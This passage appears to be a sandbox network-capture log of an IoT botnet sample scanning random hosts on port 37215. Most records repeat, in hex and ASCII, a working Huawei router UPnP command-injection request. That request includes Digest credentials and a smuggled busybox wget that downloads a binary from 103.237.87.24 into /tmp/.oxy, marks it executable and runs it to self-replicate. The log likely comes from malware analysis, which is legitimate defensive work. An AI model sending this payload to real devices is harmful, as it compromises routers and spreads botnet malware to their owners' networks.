6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2486192.168.2.1351916157.156.45.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635628939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2487192.168.2.1349166157.21.163.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635644913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2488192.168.2.1344218157.243.245.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635668993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2489192.168.2.1344676157.160.52.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635749102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2490192.168.2.1340466197.100.186.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635795116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2491192.168.2.1334052197.151.220.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635796070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2492192.168.2.1344642157.91.224.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635807037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2493192.168.2.135277641.33.161.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635833979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2494192.168.2.134747280.238.3.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635884047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2495192.168.2.135905641.73.75.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635907888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2496192.168.2.134500464.161.200.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635979891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
